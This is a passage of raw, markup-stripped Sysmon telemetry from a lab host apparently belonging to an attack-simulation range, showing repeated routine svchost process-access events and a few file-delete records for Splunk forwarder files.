13:17:19.687{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497447Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:17:19.687{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497446Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:17:19.687{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497445Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:17:19.687{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497444Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:17:19.687{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497443Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:17:19.687{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497442Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:17:19.687{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497441Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:17:19.687{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497440Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:17:19.686{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497439Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:17:19.686{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497438Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:17:19.686{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497437Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:17:19.686{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497436Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:17:19.686{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497435Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:17:19.686{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497434Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:17:19.686{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497433Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:17:19.686{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497432Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:17:19.686{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497431Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:17:19.686{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497430Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:17:19.686{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497429Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:17:19.686{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497428Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:17:19.686{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4134-611D-AC00-00000000C801}4856C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497427Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:17:19.686{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4134-611D-AC00-00000000C801}4856C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497426Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:17:19.686{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4134-611D-AC00-00000000C801}4856C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497425Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:17:19.685{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4134-611D-AC00-00000000C801}4856C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497424Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:17:19.685{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4134-611D-AC00-00000000C801}4856C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497423Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:17:19.685{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4134-611D-AC00-00000000C801}4856C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497422Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:17:19.685{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4134-611D-AC00-00000000C801}4856C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497421Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:17:19.685{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4134-611D-AC00-00000000C801}4856C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497420Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:17:19.685{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4134-611D-AC00-00000000C801}4856C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497419Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:17:19.685{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4134-611D-AC00-00000000C801}4856C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000036497453Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:17:20.936{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A1F5C063112C5F3AB0C3A51396A6A4B1,SHA256=9E2E259905AD7740033B4D2E18C0CA8CB7788819DBCC6ED7819AC519FC4944CA,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036497454Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:17:21.984{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8755C326CD636A3DA0A0D3C8FE4B59F6,SHA256=272411C743ECABBC89A160F022E9144E591325524026BAE3EFDF1634C9728CBC,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036497456Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:17:23.234{B81B27B7-4012-611D-1100-00000000C801}968NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive0.datMD5=78B5C2B77C3A9AB8DF789188F1652611,SHA256=85554F55ADA102DA18A2A90CE86B48A862E1217F60C39464BEDF4B1593E0AC80,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036497455Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:17:23.003{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D0604E788527F531D7F13E4475CBCA38,SHA256=7A6F71E57D075AE920B6CF6FA9888773C5876D4A3649F3F034B77D9C45BE94A8,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000036497475Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:17:24.886{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-A0E4-6140-8256-04000000C801}5480C:\Program 